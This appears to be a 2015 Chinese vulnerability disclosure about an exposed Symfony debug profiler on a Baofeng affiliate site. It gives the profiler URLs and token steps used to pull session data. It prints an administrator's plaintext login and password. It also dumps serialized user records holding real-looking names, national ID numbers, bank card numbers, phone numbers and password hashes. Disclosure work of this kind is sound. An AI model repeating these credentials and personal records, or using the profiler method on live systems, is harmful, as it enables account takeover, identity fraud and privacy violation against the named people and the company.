漏洞详情

披露状态:

2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-15: 厂商已经确认,细节仅向厂商公开
2015-07-25: 细节向核心白帽子及相关领域专家公开
2015-08-04: 细节向普通白帽子公开
2015-08-14: 细节向实习白帽子公开
2015-08-29: 细节向公众公开

简要描述:

可导致部分用户(姓名/银行卡号/手机号/邮箱/密码明文)
不过我想,已经抓到管理员帐号密码明文。一切只是时间问题。

详细说明:

用symfony这个框架搭建的配置不当
后台地址http://union.baofeng.com/login
抓到管理员帐号密码

Key	Value
_password "wangnan123"
_target_path "/admin/"
_username "bfwangnan"


2015-07-14 18:35:24的屏幕截图.png


2015-07-14 18:35:38的屏幕截图.png


这个洞最蛋疼的就是得等,不过管理帐号都搞到了,就不用再等了
浏览这个页面http://union.baofeng.com/_profiler/empty/search/results?limit=100
关键信息就是第一行的token
我们用这个token访问这个http://union.baofeng.com/_profiler/b616dc
把token加到_profiler后面
我列举几个 姜兆勇 [email protected] 15996110393 320723198510192617 6217001280001247353
http://union.baofeng.com/_profiler/60e43b

"C:74:"Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken":2385:{a:3:{i:0;N;i:1;s:12:"secured_area";i:2;s:2335:"a:4:{i:0;O:30:"Baofeng\NvwaBundle\Entity\User":32:{s:34:"u0000Baofeng\NvwaBundle\Entity\Useru0000id";i:25650;s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000baofeng_uid";s:18:"135601920031388542";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000username";s:9:"pierjiang";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000password";s:32:"040b96942b3bc38647365171c4e05ea8";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000email";s:16:"[email protected]";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000phone";s:11:"15996110393";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000realname";s:9:"姜兆勇";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000promote_code";i:61645804;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000channel_id";N;s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000balance";i:2240;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_type";i:2;s:38:"u0000Baofeng\NvwaBundle\Entity\Useru0000status";i:2;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_roles";s:25:"ROLE_SITE_OWNER,ROLE_USER";s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_at";i:1394679128;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_by";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_at";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_by";i:0;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_at";i:1394763193;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_by";i:20971;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_at";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_by";i:0;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000last_login";i:1436867562;s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_bank";s:3:"CCB";s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_province";i:18;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_city";i:129;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_found";s:27:"连云港海棠路分理处";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_card";s:19:"6217001280001247353";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_name";s:9:"姜兆勇";s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000identity_no";s:18:"320723198510192617";s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000is_paid";i:1;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_ratio";N;s:48:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_discount";d:1;}i:1;b:1;i:2;a:2:{i:0;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:15:"ROLE_SITE_OWNER";}i:1;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:9:"ROLE_USER";}}i:3;a:0:{}}";}}"


2015-07-14 18:06:51的屏幕截图.png

2015-07-14 18:02:27的屏幕截图.png


http://union.baofeng.com/_profiler/79e874
秦嘉成 445321198507235214 [email protected] 18620909778 557decc0bfc6ef3dcfeaf4f9f05819af

"C:74:"Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken":2220:{a:3:{i:0;N;i:1;s:12:"secured_area";i:2;s:2170:"a:4:{i:0;O:30:"Baofeng\NvwaBundle\Entity\User":32:{s:34:"u0000Baofeng\NvwaBundle\Entity\Useru0000id";i:29720;s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000baofeng_uid";s:18:"135601920065572877";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000username";s:7:"ken1288";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000password";s:32:"557decc0bfc6ef3dcfeaf4f9f05819af";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000email";s:16:"[email protected]";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000phone";s:11:"18620909778";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000realname";s:9:"秦嘉成";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000promote_code";i:31817884;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000channel_id";N;s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000balance";i:90;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_type";i:1;s:38:"u0000Baofeng\NvwaBundle\Entity\Useru0000status";i:2;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_roles";s:9:"ROLE_USER";s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_at";i:1428939059;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_by";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_at";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_by";i:0;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_at";i:1429510375;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_by";i:20971;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_at";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_by";i:0;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000last_login";i:1436866632;s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_bank";s:3:"BOC";s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_province";i:27;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_city";i:250;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_found";s:18:"广州羊城支行";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_card";s:19:"6227003320750325120";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_name";s:9:"秦嘉成";s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000identity_no";s:18:"445321198507235214";s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000is_paid";i:1;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_ratio";N;s:48:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_discount";d:1;}i:1;b:1;i:2;a:1:{i:0;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:9:"ROLE_USER";}}i:3;a:0:{}}";}}"


http://union.baofeng.com/_profiler/e6a93e

"C:74:"Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken":3354:{a:3:{i:0;N;i:1;s:12:"secured_area";i:2;s:3304:"a:4:{i:0;O:30:"Baofeng\NvwaBundle\Entity\User":32:{s:34:"u0000Baofeng\NvwaBundle\Entity\Useru0000id";i:20971;s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000baofeng_uid";s:18:"135601920019788257";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000username";s:10:"bfwangnan ";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000password";s:32:"9c0ac866ba42e7fe3c10b803f624534f";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000email";s:19:"[email protected]";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000phone";s:10:"1235414321";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000realname";s:10:"bfwangnan ";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000promote_code";i:0;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000channel_id";N;s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000balance";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_type";i:9;s:38:"u0000Baofeng\NvwaBundle\Entity\Useru0000status";i:2;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_roles";s:135:"ROLE_SUPER_ADMIN,ROLE_USER_ADMIN,ROLE_FINANCE,ROLE_STATS,ROLE_SITE_ADMIN,ROLE_PAGE_EDITOR,ROLE_PAGE_ADMIN,ROLE_BD_ADMIN,ROLE_SHOP_ADMIN";s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_at";i:1375266262;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_by";i:1;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_at";i:1428377095;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_by";i:20971;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_at";i:0;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_by";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_at";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_by";i:0;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000last_login";i:1436866861;s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_bank";s:0:"";s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_province";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_city";i:0;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_found";s:0:"";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_card";s:0:"";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_name";s:0:"";s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000identity_no";s:0:"";s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000is_paid";i:1;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_ratio";N;s:48:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_discount";d:1;}i:1;b:1;i:2;a:9:{i:0;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:16:"ROLE_SUPER_ADMIN";}i:1;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:15:"ROLE_USER_ADMIN";}i:2;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:12:"ROLE_FINANCE";}i:3;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:10:"ROLE_STATS";}i:4;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:15:"ROLE_SITE_ADMIN";}i:5;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:16:"ROLE_PAGE_EDITOR";}i:6;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:15:"ROLE_PAGE_ADMIN";}i:7;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:13:"ROLE_BD_ADMIN";}i:8;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:15:"ROLE_SHOP_ADMIN";}}i:3;a:0:{}}";}}"


http://union.baofeng.com/_profiler/40f295
冯晶晶 [email protected] 798c089807b2ec3ff4d67a34f436185c 18201659496

"C:74:"Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken":2191:{a:3:{i:0;N;i:1;s:12:"secured_area";i:2;s:2141:"a:4:{i:0;O:30:"Baofeng\NvwaBundle\Entity\User":32:{s:34:"u0000Baofeng\NvwaBundle\Entity\Useru0000id";i:28800;s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000baofeng_uid";s:18:"135601920055985064";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000username";s:16:"zhuangjilianmeng";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000password";s:32:"798c089807b2ec3ff4d67a34f436185c";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000email";s:16:"[email protected]";s:37:"u0000Baofeng\NvwaBundle\Entity\Useru0000phone";s:11:"18201659496";s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000realname";s:9:"冯晶晶";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000promote_code";i:26756774;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000channel_id";N;s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000balance";i:60420;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_type";i:1;s:38:"u0000Baofeng\NvwaBundle\Entity\Useru0000status";i:2;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000user_roles";s:9:"ROLE_USER";s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_at";i:1421980882;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000create_by";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_at";i:1421997796;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000update_by";i:20971;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_at";i:1421996666;s:40:"u0000Baofeng\NvwaBundle\Entity\Useru0000audit_by";i:20971;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_at";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000delete_by";i:0;s:42:"u0000Baofeng\NvwaBundle\Entity\Useru0000last_login";i:1436866778;s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_bank";s:0:"";s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_province";i:0;s:41:"u0000Baofeng\NvwaBundle\Entity\Useru0000bank_city";i:0;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_found";s:0:"";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_card";s:0:"";s:44:"u0000Baofeng\NvwaBundle\Entity\Useru0000account_name";s:0:"";s:43:"u0000Baofeng\NvwaBundle\Entity\Useru0000identity_no";s:0:"";s:39:"u0000Baofeng\NvwaBundle\Entity\Useru0000is_paid";i:1;s:45:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_ratio";N;s:48:"u0000Baofeng\NvwaBundle\Entity\Useru0000install_discount";d:0.40000000000000002;}i:1;b:1;i:2;a:1:{i:0;O:41:"Symfony\Component\Security\Core\Role\Role":1:{s:47:"u0000Symfony\Component\Security\Core\Role\Roleu0000role";s:9:"ROLE_USER";}}i:3;a:0:{}}";}}"

漏洞证明:

2015-07-14 18:35:24的屏幕截图.png

2015-07-14 18:35:38的屏幕截图.png

2015-07-14 18:06:51的屏幕截图.png

2015-07-14 18:02:27的屏幕截图.png

修复方案:

你懂得!

标签: none

评论已关闭